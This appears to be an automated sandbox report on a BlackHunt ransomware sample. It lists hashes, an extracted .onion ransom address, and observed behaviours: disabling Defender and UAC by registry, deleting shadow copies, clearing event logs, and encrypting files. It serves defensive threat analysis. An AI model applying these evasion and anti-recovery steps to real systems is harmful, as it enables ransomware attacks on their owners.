Analysis
-
max time kernel
138s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18-01-2024 23:33
Static task
static1
Behavioral task
behavioral1
Sample
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe
Resource
win10v2004-20231222-en
General
-
Target
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe
-
Size
707KB
-
MD5
3396d326b173417704e6bf0d97136a12
-
SHA1
5d5e58b2125fd40756665e1040070653928e98e8
-
SHA256
626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1
-
SHA512
3f9de6b913041581563a30b98d27400aa3a8393b012ceb6d0a2e1c8c4d2c74dc38ed8a7fa685c288673ca868b4e2400df045bdd01ecbc41a16339d6e4ab9c3fd
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z8Cvnh:6uaTmkZJ+naie5OTamgEoKxLWaMh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2392 fsutil.exe 2368 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1912 wevtutil.exe 560 wevtutil.exe 2780 wevtutil.exe 2572 wevtutil.exe 2060 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2796 bcdedit.exe 2800 bcdedit.exe 988 bcdedit.exe 1804 bcdedit.exe -
Renames multiple (2861) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2660 wbadmin.exe 1632 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\N: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\Y: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\J: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\K: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\L: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\B: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\S: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\Q: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\A: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\G: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\V: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\M: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\P: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\Z: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\H: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\R: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\T: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\I: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\O: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened (read-only) \??\X: 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Christmas 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\km\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tunis 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser_5.5.0.165303.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\720x480blacksquare.png 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\#BlackHunt_Private.key 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#BlackHunt_ReadMe.txt 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Lima 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Mendoza 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\scene_button_style_default_Thumbnail.bmp 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2420 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 880 vssadmin.exe 864 vssadmin.exe 2988 vssadmin.exe 2648 vssadmin.exe 1104 vssadmin.exe 748 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeRestorePrivilege 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeBackupPrivilege 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeTakeOwnershipPrivilege 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeAuditPrivilege 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeSecurityPrivilege 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeIncBasePriorityPrivilege 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe Token: SeBackupPrivilege 2316 vssvc.exe Token: SeRestorePrivilege 2316 vssvc.exe Token: SeAuditPrivilege 2316 vssvc.exe Token: SeBackupPrivilege 2896 wbengine.exe Token: SeRestorePrivilege 2896 wbengine.exe Token: SeSecurityPrivilege 2896 wbengine.exe Token: SeSecurityPrivilege 560 wevtutil.exe Token: SeBackupPrivilege 560 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2836 wrote to memory of 2780 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 29 PID 2836 wrote to memory of 2780 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 29 PID 2836 wrote to memory of 2780 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 29 PID 2836 wrote to memory of 2780 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 29 PID 2836 wrote to memory of 2764 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 31 PID 2836 wrote to memory of 2764 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 31 PID 2836 wrote to memory of 2764 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 31 PID 2836 wrote to memory of 2764 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 31 PID 2836 wrote to memory of 2292 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 33 PID 2836 wrote to memory of 2292 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 33 PID 2836 wrote to memory of 2292 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 33 PID 2836 wrote to memory of 2292 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 33 PID 2836 wrote to memory of 2060 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 35 PID 2836 wrote to memory of 2060 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 35 PID 2836 wrote to memory of 2060 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 35 PID 2836 wrote to memory of 2060 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 35 PID 2836 wrote to memory of 2732 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 37 PID 2836 wrote to memory of 2732 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 37 PID 2836 wrote to memory of 2732 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 37 PID 2836 wrote to memory of 2732 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 37 PID 2764 wrote to memory of 2752 2764 cmd.exe 39 PID 2764 wrote to memory of 2752 2764 cmd.exe 39 PID 2764 wrote to memory of 2752 2764 cmd.exe 39 PID 2060 wrote to memory of 2908 2060 cmd.exe 43 PID 2060 wrote to memory of 2908 2060 cmd.exe 43 PID 2060 wrote to memory of 2908 2060 cmd.exe 43 PID 2292 wrote to memory of 2956 2292 cmd.exe 42 PID 2292 wrote to memory of 2956 2292 cmd.exe 42 PID 2292 wrote to memory of 2956 2292 cmd.exe 42 PID 2780 wrote to memory of 2936 2780 cmd.exe 40 PID 2780 wrote to memory of 2936 2780 cmd.exe 40 PID 2780 wrote to memory of 2936 2780 cmd.exe 40 PID 2732 wrote to memory of 2612 2732 cmd.exe 41 PID 2732 wrote to memory of 2612 2732 cmd.exe 41 PID 2732 wrote to memory of 2612 2732 cmd.exe 41 PID 2836 wrote to memory of 2816 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 44 PID 2836 wrote to memory of 2816 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 44 PID 2836 wrote to memory of 2816 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 44 PID 2836 wrote to memory of 2816 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 44 PID 2836 wrote to memory of 2740 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 46 PID 2836 wrote to memory of 2740 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 46 PID 2836 wrote to memory of 2740 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 46 PID 2836 wrote to memory of 2740 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 46 PID 2836 wrote to memory of 2756 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 48 PID 2836 wrote to memory of 2756 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 48 PID 2836 wrote to memory of 2756 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 48 PID 2836 wrote to memory of 2756 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 48 PID 2836 wrote to memory of 2592 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 50 PID 2836 wrote to memory of 2592 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 50 PID 2836 wrote to memory of 2592 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 50 PID 2836 wrote to memory of 2592 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 50 PID 2836 wrote to memory of 1676 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 52 PID 2836 wrote to memory of 1676 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 52 PID 2836 wrote to memory of 1676 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 52 PID 2836 wrote to memory of 1676 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 52 PID 2816 wrote to memory of 2648 2816 cmd.exe 53 PID 2816 wrote to memory of 2648 2816 cmd.exe 53 PID 2816 wrote to memory of 2648 2816 cmd.exe 53 PID 2836 wrote to memory of 2020 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 54 PID 2836 wrote to memory of 2020 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 54 PID 2836 wrote to memory of 2020 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 54 PID 2836 wrote to memory of 2020 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 54 PID 2836 wrote to memory of 2152 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 55 PID 2836 wrote to memory of 2152 2836 626fb83b38c1f95d06de0aa643bd6690e834a719ad592a1e3a380eaea53676c1.exe 55 -
System policy modification 1 TTPs 3 IoCs
